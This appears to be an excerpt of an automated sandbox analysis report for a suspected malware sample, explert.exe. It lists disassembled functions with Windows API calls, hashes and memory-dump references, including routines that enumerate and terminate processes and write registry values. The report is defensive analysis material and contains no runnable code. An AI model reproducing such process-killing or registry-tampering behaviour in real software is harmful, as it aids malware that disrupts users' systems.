                                                                                                                                                                                            • Opcode ID: 6e33f974fbe15bf604a9154332d75bbeb42f16ae86d25dae1f7121712b0a5d08
                                                                                                                                                                                            • Instruction ID: b07f23bcf4ba3e557c6adc5f851c35ca7d507cac8a9ff250e07d95475167c945
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6e33f974fbe15bf604a9154332d75bbeb42f16ae86d25dae1f7121712b0a5d08
                                                                                                                                                                                            • Instruction Fuzzy Hash: C2316B32E1021DABDF109F94CD45BEEBB7ABB99314F245619E50477184E7B06984CBA0
                                                                                                                                                                                            Function 0056C914 Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • _free.LIBCMT ref: 0056C9E4
                                                                                                                                                                                            • _free.LIBCMT ref: 0056CA0D
                                                                                                                                                                                            • SetEndOfFile.KERNEL32(00000000,0056ACFD,00000000,0056AF94,?,?,?,?,?,?,?,0056ACFD,0056AF94,00000000), ref: 0056CA3F
                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,0056ACFD,0056AF94,00000000,?,?,?,?,00000000), ref: 0056CA5B
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _free$ErrorFileLast
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1547350101-0
                                                                                                                                                                                            • Opcode ID: 08caa35a60eeb803c76b3b5413a19f4a77b68dcbec79133ed9cfcb0fbfec717e
                                                                                                                                                                                            • Instruction ID: b4a30312dabe1562152e223837cce513ecc914c9a7aeba298c927648e8862657
                                                                                                                                                                                            • Opcode Fuzzy Hash: 08caa35a60eeb803c76b3b5413a19f4a77b68dcbec79133ed9cfcb0fbfec717e
                                                                                                                                                                                            • Instruction Fuzzy Hash: E941F672900206ABDB11ABF9CC4ABBE3F79BF85360F140512F895F7291EA30ED448760
                                                                                                                                                                                            Function 00564496 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 005593E4: _free.LIBCMT ref: 005593F2
                                                                                                                                                                                              • Part of subcall function 0056408B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,00561A10,?,00000000,00000000), ref: 00564137
                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 005644FE
                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00564505
                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00564544
                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 0056454B
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 167067550-0
                                                                                                                                                                                            • Opcode ID: 184ee9acc19b89108fe3f38a6e8433f46c427bb098aa7883d8534031e232cccd
                                                                                                                                                                                            • Instruction ID: 90696a3c7b5863fdeacf5bff036445c4804739d1ff3104489f48ea9c5583d959
                                                                                                                                                                                            • Opcode Fuzzy Hash: 184ee9acc19b89108fe3f38a6e8433f46c427bb098aa7883d8534031e232cccd
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D21A171600216AF9F20AFA5DC8597BBFACFF953757108519F82697151EB30EC408FA0
                                                                                                                                                                                            Function 0055CA90 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetLastError.KERNEL32(00531920,00000001,00531924,00556D0D,00000001,00000000,00000000,?,0055CD85,00000000,00000000,00000001,00000000,00531920,00000104), ref: 0055CA95
                                                                                                                                                                                            • _free.LIBCMT ref: 0055CAF2
                                                                                                                                                                                            • _free.LIBCMT ref: 0055CB28
                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,00000006,000000FF,?,0055CD85,00000000,00000000,00000001,00000000,00531920,00000104), ref: 0055CB33
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLast_free
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2283115069-0
                                                                                                                                                                                            • Opcode ID: 9ed28f6d6729cd0f0ddf21b37798fc0aab2f1d89aa247d8719880587c857861b
                                                                                                                                                                                            • Instruction ID: 451bc6741bb18d5d9da94e1c31b5eeb3c670e7271e70d9485f964eba1ab15503
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9ed28f6d6729cd0f0ddf21b37798fc0aab2f1d89aa247d8719880587c857861b
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0C110A722043076ED611A378ECAAD2B2E69BBC17B7B690737FD25921D1DD604C0DA220
                                                                                                                                                                                            Function 0055CBE7 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00558B2B,005609C0,?,?,005518D8,?,?,?,?,?,005311E3,?,?), ref: 0055CBEC
                                                                                                                                                                                            • _free.LIBCMT ref: 0055CC49
                                                                                                                                                                                            • _free.LIBCMT ref: 0055CC7F
                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,005518D8,?,?,?,?,?,005311E3,?,?), ref: 0055CC8A
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLast_free
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2283115069-0
                                                                                                                                                                                            • Opcode ID: 2fe41a6600c04ed7ad8e4c39a0f197c658ea78e3f747a31f2ab474658e3703c3
                                                                                                                                                                                            • Instruction ID: a0cebb7cfe4cfa5068e970ccfc8cebc9c4fab89ef073acc9ff5f66b94a6b70a9
                                                                                                                                                                                            • Opcode Fuzzy Hash: 2fe41a6600c04ed7ad8e4c39a0f197c658ea78e3f747a31f2ab474658e3703c3
                                                                                                                                                                                            • Instruction Fuzzy Hash: CD112C322043026ED6116375ECAAD2B2E69F7C23B3B250637FD3D921D1DD218C4DB260
                                                                                                                                                                                            Function 00531330 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • K32EnumProcesses.KERNEL32(?,00001000,?), ref: 0053134D
                                                                                                                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00531397
                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 005313A2
                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 005313A9
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Process$CloseEnumHandleOpenProcessesTerminate
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1176117389-0
                                                                                                                                                                                            • Opcode ID: 1f7988858fe8d4e1db3a47691a6f760ed2e8ac80000815d7114f363dcec0d755
                                                                                                                                                                                            • Instruction ID: 99f2a7c6665e93a2252ec10b5c7b727a96228571170c20fe5f56a015e019a3b6
                                                                                                                                                                                            • Opcode Fuzzy Hash: 1f7988858fe8d4e1db3a47691a6f760ed2e8ac80000815d7114f363dcec0d755
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0701A2766002096BEB219AB8EC8AFDE779DAF49752F000570FF08D3140EAA1AD855769
                                                                                                                                                                                            Function 00539EB0 Relevance: 6.0, APIs: 4, Instructions: 43registryCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000002,?), ref: 00539ECC
                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,00000010,?), ref: 00539EF9
                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00539F06
                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00539F10
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Close$OpenValue
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3951040859-0
                                                                                                                                                                                            • Opcode ID: ac7c69771cc02ce445bdbf2f478f3eedd458c5b695b13fc48ad07385e02c9f9a
                                                                                                                                                                                            • Instruction ID: 34e203c94f162f770f595278d86d593f8c6f89519743cbfaf6bd8c14bd4eae39
                                                                                                                                                                                            • Opcode Fuzzy Hash: ac7c69771cc02ce445bdbf2f478f3eedd458c5b695b13fc48ad07385e02c9f9a
                                                                                                                                                                                            • Instruction Fuzzy Hash: DF012874200204EFEF09CF14D88AE663B6AFB44714F508458F5158F2A1E7F2ED45EBA0
                                                                                                                                                                                            Function 0056C4ED Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • WriteConsoleW.KERNEL32(00000000,00000000,00000010,00000000,00000000,?,00568E52,00000000,00000001,00000000,00000000,?,0055E22D,?,00000010,00000000), ref: 0056C504
                                                                                                                                                                                            • GetLastError.KERNEL32(?,00568E52,00000000,00000001,00000000,00000000,?,0055E22D,?,00000010,00000000,?,00000000,?,0055E779,00000010), ref: 0056C510
                                                                                                                                                                                              • Part of subcall function 0056C4D6: CloseHandle.KERNEL32(FFFFFFFE,0056C520,?,00568E52,00000000,00000001,00000000,00000000,?,0055E22D,?,00000010,00000000,?,00000000), ref: 0056C4E6
                                                                                                                                                                                            • ___initconout.LIBCMT ref: 0056C520
                                                                                                                                                                                              • Part of subcall function 0056C498: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0056C4C7,00568E3F,00000000,?,0055E22D,?,00000010,00000000,?), ref: 0056C4AB
                                                                                                                                                                                            • WriteConsoleW.KERNEL32(00000000,00000000,00000010,00000000,?,00568E52,00000000,00000001,00000000,00000000,?,0055E22D,?,00000010,00000000,?), ref: 0056C535
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2744216297-0
                                                                                                                                                                                            • Opcode ID: 9d56bff7bd8da9cf0c6e73eb6d9b1f31048720b42e5084b32b9d00853a8fc760
                                                                                                                                                                                            • Instruction ID: 525c3f3b78b42d87522e27032e89133050b11d06954f6145421eb42e86d7f608
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9d56bff7bd8da9cf0c6e73eb6d9b1f31048720b42e5084b32b9d00853a8fc760
                                                                                                                                                                                            • Instruction Fuzzy Hash: DEF03036001115BBCF226F95EC09EAE3F26FB683B2F004420FA4D97130DA729824FB90
                                                                                                                                                                                            Function 0055BC9F Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • _free.LIBCMT ref: 0055BCA8
                                                                                                                                                                                              • Part of subcall function 0055CE37: HeapFree.KERNEL32(00000000,00000000,?,00566429,?,00000000,?,?,?,005666CC,?,00000007,?,?,00566BBF,?), ref: 0055CE4D
                                                                                                                                                                                              • Part of subcall function 0055CE37: GetLastError.KERNEL32(?,?,00566429,?,00000000,?,?,?,005666CC,?,00000007,?,?,00566BBF,?,?), ref: 0055CE5F
                                                                                                                                                                                            • _free.LIBCMT ref: 0055BCBB
                                                                                                                                                                                            • _free.LIBCMT ref: 0055BCCC
                                                                                                                                                                                            • _free.LIBCMT ref: 0055BCDD
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                            • Opcode ID: 2c4c3dd4f6272c17a6cc474db12ee4427166e9a90917dc9ff5b79a3f64a10043
                                                                                                                                                                                            • Instruction ID: 7da714cc8b81c54b61a560244257a9c573cac778a0ab1bdcfe88dbd9faffe674
                                                                                                                                                                                            • Opcode Fuzzy Hash: 2c4c3dd4f6272c17a6cc474db12ee4427166e9a90917dc9ff5b79a3f64a10043
                                                                                                                                                                                            • Instruction Fuzzy Hash: B7E0B671800A21AE87826F14BE5B45B3E3DBBB4B517057407FD2032271DA72655EFF89
                                                                                                                                                                                            Function 0053EC30 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 206COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0053EF60
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Ios_base_dtorstd::ios_base::_
                                                                                                                                                                                            • String ID: 0$H
                                                                                                                                                                                            • API String ID: 323602529-1388647558
                                                                                                                                                                                            • Opcode ID: e44eda4911ab0d178b341d7c5f0e6e1b589e78d19a398e97193e8ab283347e0d
                                                                                                                                                                                            • Instruction ID: 063f6da4d93934b5383b96754bd4082c00750a56b29e9dc633f95578bdb868b1
                                                                                                                                                                                            • Opcode Fuzzy Hash: e44eda4911ab0d178b341d7c5f0e6e1b589e78d19a398e97193e8ab283347e0d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 66A15D74A002199FDB14CF58C885BDEBBB5BF49300F1485E8E449AB381DB70AE89CF91
                                                                                                                                                                                            Function 0055910D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __startOneArgErrorHandling.LIBCMT ref: 0055919D
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorHandling__start
                                                                                                                                                                                            • String ID: pow
                                                                                                                                                                                            • API String ID: 3213639722-2276729525
                                                                                                                                                                                            • Opcode ID: fccc94c055a23962e2225939ebd0ae1b7ba30c3c9de107ea8be3ff25d65e7eea
                                                                                                                                                                                            • Instruction ID: 3eee60543f35e46c544889d329ef856876e2a7146099ee07041bdb69ad20ea5f
                                                                                                                                                                                            • Opcode Fuzzy Hash: fccc94c055a23962e2225939ebd0ae1b7ba30c3c9de107ea8be3ff25d65e7eea
                                                                                                                                                                                            • Instruction Fuzzy Hash: 37519C61A08603D6CB117714DD2936A3FA8FB90742F204D5AF895432E9EB398DDDFB42
                                                                                                                                                                                            Function 0053FA30 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 145COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 0053FB90
                                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 0053FB95
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                            • String ID: eT
                                                                                                                                                                                            • API String ID: 118556049-1760902009
                                                                                                                                                                                            • Opcode ID: 7333919df190098a016cfe7dbdb365896b105da4e3f8f89e44a2f20269ce9e39
                                                                                                                                                                                            • Instruction ID: 0e34cbac363ad5007c83a97fb210ab533ef0a2512ce15204e88b68f0f85b99e5
                                                                                                                                                                                            • Opcode Fuzzy Hash: 7333919df190098a016cfe7dbdb365896b105da4e3f8f89e44a2f20269ce9e39
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1B419F75A007019FD724CF29C4A0A6AFBE1FF58711F14892EE89A87711D731ED95CB90
                                                                                                                                                                                            Function 005599DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
                                                                                                                                                                                            • API String ID: 0-3350077389
                                                                                                                                                                                            • Opcode ID: ac42a1f838aced4eab65b501b249c3e6a697f93f5a57a4018b79f7c6c328d1de
                                                                                                                                                                                            • Instruction ID: 93dd97fb4c3d1d8d23e910073c1bc1d822478e3143daf3e6d4f20b5a46ffd38a
                                                                                                                                                                                            • Opcode Fuzzy Hash: ac42a1f838aced4eab65b501b249c3e6a697f93f5a57a4018b79f7c6c328d1de
                                                                                                                                                                                            • Instruction Fuzzy Hash: DB41BEB1A00215EFDB229B99D8959AEBFFDFB85311F100067EC04A7250E7B49E48DB60
                                                                                                                                                                                            Function 00554072 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00554097
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: EncodePointer
                                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                                            • API String ID: 2118026453-2084237596
                                                                                                                                                                                            • Opcode ID: b63b6077db45e670c5e5b6b0a1a7aad49fbf040f977e28cb7e8260189a092a62
                                                                                                                                                                                            • Instruction ID: 546d50af7add87e9863318d899c7c22e700be1965d933f9c5d85fe40ccc06ac5
                                                                                                                                                                                            • Opcode Fuzzy Hash: b63b6077db45e670c5e5b6b0a1a7aad49fbf040f977e28cb7e8260189a092a62
                                                                                                                                                                                            • Instruction Fuzzy Hash: FF418831900209AFCF15CF98CC95AAEBFB5BF48309F14805AFD04AB261D3359AA4CF50
                                                                                                                                                                                            Function 00532310 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • ___std_exception_copy.LIBVCRUNTIME ref: 005323CE
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ___std_exception_copy
                                                                                                                                                                                            • String ID: c4S$ios_base::failbit set
                                                                                                                                                                                            • API String ID: 2659868963-823812268
